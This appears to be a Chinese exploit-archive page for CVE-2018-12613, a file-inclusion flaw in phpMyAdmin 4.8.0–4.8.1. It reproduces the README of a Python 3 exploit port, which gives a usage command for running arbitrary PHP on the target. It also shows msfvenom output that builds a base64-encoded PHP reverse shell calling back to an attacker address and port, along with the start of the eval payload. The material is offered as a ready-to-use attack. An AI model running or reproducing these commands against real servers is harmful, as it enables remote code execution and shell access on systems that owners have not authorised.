关联漏洞
标题:
phpMyAdmin 安全漏洞
(CVE-2018-12613)
描述:phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 phpMyAdmin 4.8.2之前的4.8.x版本中存在安全漏洞。攻击者可利用该漏洞包含(查看并可能执行)服务器上的文件。
描述
Modified standalone exploit ported for Python 3
介绍
# CVE-2018-12613
Modified standalone exploit ported to Python 3. Tested on Python 3.7.3, phpMyAdmin 4.8.1 running on Ubuntu 16.04
Works on Linux only. Original exploit [by SSD](https://github.com/ssd-secure-disclosure/advisories/tree/master/SSD%20Advisory%20-%203700). All credits to them.
## Changes made
1. Added function to exit if provided phpMyAdmin username/password is correct
2. Added function to check if version is vulnerable (4.8.0 or 4.8.1)
3. Converted variables to either bytes or strings strictly; Python 3 disallows mixing. See [this](https://portingguide.readthedocs.io/en/latest/strings.html).
## Usage:
`python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”`
Results of php code stored in `results.html`
### For reverse shell
```
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php
```
Use the `msfvenom` php payload in place of `phpcredits();` above
`root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php`
> eval(base64_decode(ICAg...gfQo));
文件快照
[4.0K] /data/pocs/8da2d7d7ddb845171ed7272c3cecf3963c285736
├── [4.4K] CVE-2018-12613.py
└── [1.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。